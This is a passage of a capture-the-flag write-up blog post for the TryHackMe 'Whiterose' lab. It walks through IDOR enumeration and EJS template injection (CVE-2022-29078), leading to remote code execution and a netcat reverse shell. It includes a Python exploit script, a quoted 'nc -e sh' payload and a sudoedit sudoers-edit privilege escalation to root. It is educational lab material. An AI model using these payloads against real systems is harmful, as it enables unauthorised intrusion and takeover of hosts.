  <p>And oh! I almost forgot! - You will need these: <code class="language-plaintext highlighter-rouge">Olivia Cortez:olivi8</code></p>
</blockquote>

<p>These credentials are probably provided so we can log in here. After logging in as <code class="language-plaintext highlighter-rouge">Olivia Cortez</code>, we are greeted with this page:</p>

<p><a href="/assets/img/writeups/thm/whiterose/home.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/home.png" alt="index"  loading="lazy"></a></p>

<p>After clicking around and exploring the website, I made this table:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th style="text-align: left">Page name</th>
      <th style="text-align: left">What does it do</th>
      <th style="text-align: left">Potential vulnerabilities</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left">/</td>
      <td style="text-align: left">Show recent payments</td>
      <td style="text-align: left">N/A (static page)</td>
    </tr>
    <tr>
      <td style="text-align: left">/search</td>
      <td style="text-align: left">Search for a bank account</td>
      <td style="text-align: left">searchbar → XSS,SQLI,SSTI</td>
    </tr>
    <tr>
      <td style="text-align: left">/settings</td>
      <td style="text-align: left">We don’t have permissions</td>
      <td style="text-align: left">N/A</td>
    </tr>
    <tr>
      <td style="text-align: left">/messages/?c=INT</td>
      <td style="text-align: left">Show/Send messages</td>
      <td style="text-align: left">c=INT  → IDOR, SQLI</td>
    </tr>
    <tr>
      <td style="text-align: left"> </td>
      <td style="text-align: left"> </td>
      <td style="text-align: left">chat → SSTI,XSS,SQLi</td>
    </tr>
  </tbody>
</table></div>

<p>Since we’re still in the enumeration phase let’s focus on testing the IDOR for now.</p>

<p>Here is the <code class="language-plaintext highlighter-rouge">/message</code> page:</p>

<p><a href="/assets/img/writeups/thm/whiterose/messages.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/messages.png" alt="index"  loading="lazy"></a></p>

<p>The url carries a <code class="language-plaintext highlighter-rouge">query parameter</code> named <code class="language-plaintext highlighter-rouge">c</code>, with a default value of <code class="language-plaintext highlighter-rouge">5</code>. Let’s test if it’s vulnerable to an <a href="https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html">IDOR</a> by incrementing this number. I’ll set it to 1000:</p>

<p><a href="/assets/img/writeups/thm/whiterose/message_vulnerable_to_idor.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/message_vulnerable_to_idor.png" alt="index"  loading="lazy"></a></p>

<div file="credentials.txt" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="credentials.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>Gayle Bev:p~]P@5!6;rs558:q
</pre></td></tr></tbody></table></code></div></div>

<h4 id="admin-access"><span class="me-2">Admin access</span><a href="#admin-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>After logging in with these credentials, I tried accessing the <code class="language-plaintext highlighter-rouge">/settings</code> page.</p>

<p><a href="/assets/img/writeups/thm/whiterose/settings_base.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/settings_base.png" alt="index"  loading="lazy"></a></p>

<p>I attempted to change the password of some accounts, but it didn’t work. This probably means we HAVE to exploit this page (the authors wouldn’t have created/protected it with admin privilegess otherwise) but via other vectores.</p>

<p><a href="/assets/img/writeups/thm/whiterose/settings.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/settings.png" alt="index"  loading="lazy"></a></p>

<p>I tried some XSS payloads, but they didn’t work. I also tried <a href="https://www.kali.org/tools/sqlmap/">SQLmap</a> to check for SQL injection but found nothing. I was quite certain it was an SSTI. So, I started looking around to try to identify the template engine.</p>

<p><a href="/assets/img/writeups/thm/whiterose/Xpoweredbyleak.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/Xpoweredbyleak.png" alt="index"  loading="lazy"></a>
<em>We know that the backend is written using Express.js</em></p>

<h3 id="identifying-the-template-engine"><span class="me-2">Identifying the template engine</span><a href="#identifying-the-template-engine" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>After a quick <a href="https://www.google.com/search?q=express.js+template+engine">googling search</a> I found this on the <a href="https://expressjs.com/en/guide/using-template-engines.html">Express.js</a> documentation:</p>

<blockquote>
  <p>The Express application generator uses Pug as its default, but it also supports Handlebars, and EJS, among others.</p>
</blockquote>

<p>That’s not really helpful … We need to know which template engine is used before exploiting it. So I thought: could we make it crash somehow ? Let’s try submitting the form at <code class="language-plaintext highlighter-rouge">/settings</code> without supplying any data (no name, no password).</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>curl <span class="nt">-X</span> POST http://admin.cyprusbank.thm/settings <span class="se">\</span>
    <span class="nt">--cookie</span> <span class="s2">"connect.sid=s%3AJMq02Cp0CBuP_l8pVqYiIbELNrOjtj_5.nIQtTw015tEtvp2t8PbD%2BDIU%2BQQjebdpolEfR6B7zwM"</span> <span class="se">\</span>
    <span class="nt">-d</span> <span class="s2">""</span>
</pre></td></tr></tbody></table></code></div></div>

<div file="output.html" class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="output.html"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"alert alert-info mb-3"</span><span class="nt">&gt;</span>Please enter a valid name<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>There is probably an initial filter that says, “If there is no name, show this div and exit”. Therefore, we need to provide a name to bypass this first check:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>curl <span class="nt">-X</span> POST http://admin.cyprusbank.thm/settings <span class="se">\</span>
    <span class="nt">--cookie</span> <span class="s2">"connect.sid=s%3AJMq02Cp0CBuP_l8pVqYiIbELNrOjtj_5.nIQtTw015tEtvp2t8PbD%2BDIU%2BQQjebdpolEfR6B7zwM"</span> <span class="se">\</span>
    <span class="nt">-d</span> <span class="s2">"name=a"</span> 
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/whiterose/itsejs.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/itsejs.png" alt="index"  loading="lazy"></a>
<em>I use the <code class="language-plaintext highlighter-rouge">http</code> command from <a href="https://github.com/httpie/cli">httpie</a> for the screenshot cause it has cool syntax highlighting that makes the output more readable</em></p>

<p>We know that it’s <a href="https://ejs.co/">EJS</a>, let’s try to find some CVEs !</p>

<h3 id="looking-for-vulnerabilities"><span class="me-2">Looking for vulnerabilities</span><a href="#looking-for-vulnerabilities" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>I looked for <code class="language-plaintext highlighter-rouge">EJS</code> on <a href="https://cve.mitre.org/cve/search_cve_list.html">cve.mitre.org</a> and found a few interesting CVEs:</p>

<p><a href="/assets/img/writeups/thm/whiterose/CVE_ejs_ssti.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/CVE_ejs_ssti.png" alt="index"  loading="lazy"></a>
<em>EJS cve’s</em></p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th style="text-align: left">CVE</th>
      <th style="text-align: left">Type</th>
      <th style="text-align: left">Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left">CVE-2024-33883</td>
      <td style="text-align: left">Prototype pollution</td>
      <td style="text-align: left"><a href="https://www.cve.org/CVERecord?id=CVE-2024-33883">cve.org</a></td>
    </tr>
    <tr>
      <td style="text-align: left">CVE-2023-29827</td>
      <td style="text-align: left">SSTI</td>
      <td style="text-align: left"><a href="https://www.cve.org/CVERecord?id=CVE-2023-29827">cve.org</a></td>
    </tr>
    <tr>
      <td style="text-align: left">CVE-2022-29078</td>
      <td style="text-align: left">SSTI</td>
      <td style="text-align: left"><a href="https://www.cve.org/CVERecord?id=CVE-2022-29078">cve.org</a></td>
    </tr>
    <tr>
      <td style="text-align: left">CVE-2017-1000228</td>
      <td style="text-align: left">RCE</td>
      <td style="text-align: left"><a href="https://www.cve.org/CVERecord?id=CVE-2017-1000228">cve.org</a></td>
    </tr>
  </tbody>
</table></div>

<h1 id="exploitation">Exploitation</h1>

<h2 id="cve-2024-33883"><span class="me-2">CVE-2024-33883</span><a href="#cve-2024-33883" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>After searching a bit I found this <a href="https://github.com/Grantzile/PoC-CVE-2024-33883">poc</a> that states:</p>

<blockquote>
  <h4 id="attack-available-condition"><span class="me-2">Attack available condition</span><a href="#attack-available-condition" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
  <ol>
    <li>Needs control of render().<br /></li>
    <li>Needs control of prototype pollution attack vector.
      <ul>
        <li>Above two condition holds, RCE attack is available.</li>
      </ul>
    </li>
  </ol>
</blockquote>

<p>I don’t think we have control of a prototype pollution attack vector. It’s an easy room, searching for a prototype pollution in an easy room seems highly improbable. Let’s move on.</p>

<h2 id="cve-2023-29827"><span class="me-2">CVE-2023-29827</span><a href="#cve-2023-29827" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>After searching for POCs on <a href="https://github.com/search?q=CVE-2023-29827&amp;type=code">github</a> I came across this <a href="https://github.com/0xMarcio/cve/blob/ef3710636088a76ea8bfccbea32db4c4d6026b91/2023/CVE-2023-29827.md?plain=1#L4">repo</a>, the author says that there is no POC for this CVE. Let’s move on.</p>

<h2 id="cve-2022-29078"><span class="me-2">CVE-2022-29078</span><a href="#cve-2022-29078" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>On the <em>CVE Program</em> section of the <a href="https://www.cve.org/CVERecord?id=CVE-2022-29078">CVE.org page</a>, there is a link pointing to <a href="https://eslam.io/posts/ejs-server-side-template-injection-rce/">a blog post</a> of the guy who found the CVE. I read it and thought let’s give it a try.</p>

<h3 id="writing-a-script"><span class="me-2">Writing a script</span><a href="#writing-a-script" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>So I wrote a POC in <code class="language-plaintext highlighter-rouge">python</code>:</p>

<div file="poc.py" class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="poc.py"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td><td class="rouge-code"><pre><span class="kn">from</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">Session</span>
<span class="kn">from</span> <span class="n">sys</span> <span class="kn">import</span> <span class="n">argv</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">(</span><span class="n">url</span><span class="o">=</span><span class="sh">"</span><span class="s">http://admin.cyprusbank.thm</span><span class="sh">"</span><span class="p">,</span> 
         <span class="n">username</span><span class="o">=</span><span class="sh">"</span><span class="s">Gayle Bev</span><span class="sh">"</span><span class="p">,</span> 
         <span class="n">password</span><span class="o">=</span><span class="sh">"</span><span class="s">p~]P@5!6;rs558:q</span><span class="sh">"</span><span class="p">):</span>

    <span class="n">session</span> <span class="o">=</span> <span class="nc">Session</span><span class="p">()</span>
    <span class="n">command</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>

    <span class="c1"># Login
</span>    <span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span>
        <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span>
        <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">:</span> <span class="n">password</span><span class="p">,</span>
    <span class="p">})</span>

    <span class="c1"># In this page: https://eslam.io/posts/ejs-server-side-template-injection-rce/
</span>    <span class="c1"># we see this payload: http://localhost:3000/page?id=2&amp;settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
</span>    <span class="c1"># It is used with the GET method. Let's adapt it for the POST method:
</span>
    <span class="c1"># Sending the malicious post request
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s">/settings</span><span class="sh">"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span>
        <span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">a</span><span class="sh">"</span><span class="p">,</span> 
        <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">a</span><span class="sh">"</span><span class="p">,</span> 
        <span class="sh">"</span><span class="s">settings[view options][outputFunctionName]</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">x;process.mainModule.require(</span><span class="sh">'</span><span class="s">child_process</span><span class="sh">'</span><span class="s">).execSync(</span><span class="sh">'</span><span class="si">{</span><span class="n">command</span><span class="si">}</span><span class="sh">'</span><span class="s">);s</span><span class="sh">"</span>
    <span class="p">}).</span><span class="n">text</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span>
    <span class="nf">if</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">):</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[!] Usage: </span><span class="si">{</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> &lt;COMMAND&gt;</span><span class="sh">"</span><span class="p">)</span>
        <span class="nf">exit</span><span class="p">()</span>
        
    <span class="nf">main</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>

<h2 id="getting-rce"><span class="me-2">Getting RCE</span><a href="#getting-rce" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>First we need to validate that the running <code class="language-plaintext highlighter-rouge">EJS</code> version is affected by this <code class="language-plaintext highlighter-rouge">CVE</code>:</p>

<p><a href="/assets/img/writeups/thm/whiterose/got_rce_via_ssti_RCE.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/got_rce_via_ssti_RCE.png" alt="index"  loading="lazy"></a>
<em>Testing to send the output of <code class="language-plaintext highlighter-rouge">ls</code> through <code class="language-plaintext highlighter-rouge">netcat</code></em></p>

<p>Cool ! We have an RCE, and we know that netcat is working. Let’s try to get a reverse shell with netcat then:</p>

<p><a href="/assets/img/writeups/thm/whiterose/initial_access.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/initial_access.png" alt="index"  loading="lazy"></a>
<em>And we have initial access</em></p>

<h1 id="privesc">Privesc</h1>

<p>I always start with manual privesc, then run automated scripts. I start with the basics, like <code class="language-plaintext highlighter-rouge">sudo -l</code>, searching for <code class="language-plaintext highlighter-rouge">SUID</code> binaries, and so on. You can find more in-depth manual privesc techniques for Linux <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">here</a></p>

<h2 id="sudo--l"><span class="me-2">sudo -l</span><a href="#sudo--l" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p><a href="/assets/img/writeups/thm/whiterose/sudo_l.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/sudo_l.png" alt="index"  loading="lazy"></a></p>

<h2 id="sudoedit"><span class="me-2">Sudoedit</span><a href="#sudoedit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>After some googling, I found an interesting exploit that affects <code class="language-plaintext highlighter-rouge">sudoedit</code>:
<a href="/assets/img/writeups/thm/whiterose/found_exploit.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/found_exploit.png" alt="index"  loading="lazy"></a></p>

<p>Here is the interesting part of the poc <em>(<a href="https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc/blob/main/exploit.sh ">foundable here</a>)</em>:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nv">EXPLOITABLE</span><span class="o">=</span><span class="si">$(</span><span class="nb">sudo</span> <span class="nt">-l</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"sudoedit|sudo -e"</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s1">'\(root\)|\(ALL\)|\(ALL : ALL\)'</span> | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s1">')'</span> <span class="nt">-f</span> 2-<span class="si">)</span>
<span class="nv">EDITOR</span><span class="o">=</span><span class="s2">"vim -- /etc/sudoers"</span> <span class="nv">$EXPLOITABLE</span>
<span class="nb">sudo </span>su root
</pre></td></tr></tbody></table></code></div></div>
<p>The script tries to identify which command we’re allowed to run with sudo privileges, then run <code class="language-plaintext highlighter-rouge">vim -- /etc/sudoers the_extracted_command</code>. I tried running the script, but it didn’t work … Let’s do it manually:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nv">EDITOR</span><span class="o">=</span><span class="s2">"vim -- /etc/sudoers"</span> sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
</pre></td></tr></tbody></table></code></div></div>
<p>And it worked ! It opened the <code class="language-plaintext highlighter-rouge">sudoers</code> file, which I edited as follows:</p>

<p><a href="/assets/img/writeups/thm/whiterose/adding_us_web.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/adding_us_web.png" alt="index"  loading="lazy"></a>
<em>Giving the web user permission to run bash as root.</em></p>

<p><a href="/assets/img/writeups/thm/whiterose/weareroot.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/weareroot.png" alt="index"  loading="lazy"></a>
<em>And we’re root !</em></p>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/writeups/">Writeups</a>,
          <a href="/categories/tryhackme/">TryHackMe</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/writeups/"
            class="post-tag no-text-decoration"
          >writeups</a>
        
          <a
            href="/tags/tryhackme/"
            class="post-tag no-text-decoration"
          >tryhackme</a>
        
          <a
            href="/tags/web/"
            class="post-tag no-text-decoration"
          >web</a>
        
          <a
            href="/tags/subdomain-fuzzing/"
            class="post-tag no-text-decoration"
          >subdomain-fuzzing</a>
        
          <a
            href="/tags/idor/"
            class="post-tag no-text-decoration"
          >idor</a>
        
          <a
            href="/tags/ssti/"
            class="post-tag no-text-decoration"
          >ssti</a>
        
          <a
            href="/tags/ejs/"
            class="post-tag no-text-decoration"
          >ejs</a>
        
          <a
            href="/tags/scripting/"
            class="post-tag no-text-decoration"
          >scripting</a>
        
          <a
            href="/tags/linux-privesc/"
            class="post-tag no-text-decoration"
          >linux-privesc</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Whiterose%20-%20NullBrunk&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-whiterose%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Whiterose%20-%20NullBrunk&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-whiterose%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-whiterose%2F&text=Whiterose%20-%20NullBrunk" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              
<section id="toc-wrapper">
  <h2 class="panel-heading no-border">Event</h2>
  <ul class="content list-unstyled no-border ps-0 pb-1 ms-1 mt-2 toc-list ">
  

  </ul>
</section>




              <section>
  <h2 class="panel-heading no-border">Tags</h2>

  <nav id="toc">
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/subdomain-fuzzing/">subdomain-fuzzing</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/idor/">idor</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ssti/">ssti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ejs/">ejs</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/scripting/">scripting</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux-privesc/">linux-privesc</a>
      
    </div>
  </nav>
</section>

            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-1 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/thm-opacity/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735833600"
  data-df="ll"
  
>
  Jan  2, 2025
</time>

              <h4 class="pt-0 my-2">Opacity</h4>
              <div class="text-muted">
                <p>Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/thm-blog/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735401600"
  data-df="ll"
  
>
  Dec 28, 2024
</time>

              <h4 class="pt-0 my-2">Blog</h4>
              <div class="text-muted">
                <p>Billy Joel made a Wordpress blog!</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/wonderland/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735660800"
  data-df="ll"
  
>
  Dec 31, 2024
</time>

              <h4 class="pt-0 my-2">Wonderland</h4>
              <div class="text-muted">
                <p>Fall down the rabbit hole and enter wonderland.</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/NullBrunk">Anas</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.3"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <section>
  <h2 class="panel-heading no-border">Tags</h2>

  <nav id="toc">
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/poc/">poc</a>
      
    </div>
  </nav>
</section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
